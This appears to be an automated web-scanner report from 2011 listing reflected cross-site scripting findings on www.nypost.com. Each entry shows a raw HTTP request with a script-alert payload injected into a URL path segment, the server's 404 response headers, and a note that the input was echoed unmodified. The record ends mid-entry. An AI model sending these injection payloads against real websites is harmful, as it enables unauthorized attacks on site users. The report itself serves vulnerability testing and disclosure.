GET /r/SysConfig/WebPortal/nypost2f079<script>alert(1)</script>f4dff419fbd/blocks/calendar/calendar.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 714 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:06 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cd7dc<script>alert(1)</script>cba81287e50 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blockscd7dc<script>alert(1)</script>cba81287e50/calendar/calendar.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 714 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:09 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload da565<script>alert(1)</script>859f6e65bfa was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/calendarda565<script>alert(1)</script>859f6e65bfa/calendar.css HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 714 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:11 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload bcc59<script>alert(1)</script>884f4055345 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.cssbcc59<script>alert(1)</script>884f4055345 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 714 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:14 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d2de8<script>alert(1)</script>4fbf371b36c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfigd2de8<script>alert(1)</script>4fbf371b36c/WebPortal/nypost/blocks/calendar/calendar.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:10 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2a89c<script>alert(1)</script>edd1093622d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal2a89c<script>alert(1)</script>edd1093622d/nypost/blocks/calendar/calendar.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:12 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c98e3<script>alert(1)</script>0177970dcad was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypostc98e3<script>alert(1)</script>0177970dcad/blocks/calendar/calendar.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:14 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c07b0<script>alert(1)</script>97bc4fd44d2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocksc07b0<script>alert(1)</script>97bc4fd44d2/calendar/calendar.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:15 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 7ab4d<script>alert(1)</script>434d716871f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/calendar7ab4d<script>alert(1)</script>434d716871f/calendar.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:17 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 92231<script>alert(1)</script>ef4eaa13951 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/calendar/calendar.js92231<script>alert(1)</script>ef4eaa13951 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:19 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2aa15<script>alert(1)</script>851eec5067e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig2aa15<script>alert(1)</script>851eec5067e/WebPortal/nypost/blocks/calendar/ui.datepicker.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 718 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:06 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eff75<script>alert(1)</script>2161f17c1f4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortaleff75<script>alert(1)</script>2161f17c1f4/nypost/blocks/calendar/ui.datepicker.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 718 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:09 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 41193<script>alert(1)</script>6f24cdaaf2c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost41193<script>alert(1)</script>6f24cdaaf2c/blocks/calendar/ui.datepicker.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 718 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:10 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload faf5a<script>alert(1)</script>444e613e4c5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocksfaf5a<script>alert(1)</script>444e613e4c5/calendar/ui.datepicker.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 718 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:12 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b837c<script>alert(1)</script>4eb377f240a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/calendarb837c<script>alert(1)</script>4eb377f240a/ui.datepicker.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 718 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:13 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload d075d<script>alert(1)</script>0acb7ac2a31 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/calendar/ui.datepicker.jsd075d<script>alert(1)</script>0acb7ac2a31 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 718 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:15 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8f6ab<script>alert(1)</script>5f0fcb1404e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig8f6ab<script>alert(1)</script>5f0fcb1404e/WebPortal/nypost/blocks/comments/comments.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:23 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a4c94<script>alert(1)</script>295ff5be0b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortala4c94<script>alert(1)</script>295ff5be0b9/nypost/blocks/comments/comments.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:26 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload abd35<script>alert(1)</script>284f395086a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypostabd35<script>alert(1)</script>284f395086a/blocks/comments/comments.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:29 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload fad71<script>alert(1)</script>155317b13a0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocksfad71<script>alert(1)</script>155317b13a0/comments/comments.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:31 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f73f1<script>alert(1)</script>53d123234a5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/commentsf73f1<script>alert(1)</script>53d123234a5/comments.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:33 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b6427<script>alert(1)</script>420bf541f2c was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/comments/comments.jsb6427<script>alert(1)</script>420bf541f2c HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 713 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:36 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1d3a4<script>alert(1)</script>01077d19e02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig1d3a4<script>alert(1)</script>01077d19e02/WebPortal/nypost/blocks/fat_header/fat_header.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:15 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3a34f<script>alert(1)</script>fbd74a98150 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal3a34f<script>alert(1)</script>fbd74a98150/nypost/blocks/fat_header/fat_header.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:17 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1c323<script>alert(1)</script>4097c64930c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost1c323<script>alert(1)</script>4097c64930c/blocks/fat_header/fat_header.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:19 GMT Connection: close
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ecd79<script>alert(1)</script>f381d8b34c2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocksecd79<script>alert(1)</script>f381d8b34c2/fat_header/fat_header.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:21 GMT Connection: close
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 64067<script>alert(1)</script>a62c0e00a4e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/fat_header64067<script>alert(1)</script>a62c0e00a4e/fat_header.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 717 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:23 GMT Connection: close
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 3e10d<script>alert(1)</script>f24737f3d3 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js3e10d<script>alert(1)</script>f24737f3d3 HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 716 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:25 GMT Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 78f5c<script>alert(1)</script>3cef393e6fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig78f5c<script>alert(1)</script>3cef393e6fe/WebPortal/nypost/blocks/markets/markets.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:29 GMT Connection: close
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 954de<script>alert(1)</script>6f944906a17 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal954de<script>alert(1)</script>6f944906a17/nypost/blocks/markets/markets.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html;charset=UTF-8 Content-Length: 711 Vary: Accept-Encoding Date: Tue, 08 Feb 2011 02:33:31 GMT Connection: close
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 14e70<script>alert(1)</script>d0098b87a7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /r/SysConfig/WebPortal/nypost14e70<script>alert(1)</script>d0098b87a7/blocks/markets/markets.js HTTP/1.1 Host: www.nypost.com Proxy-Connection: keep-alive Referer: http://www.nypost.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
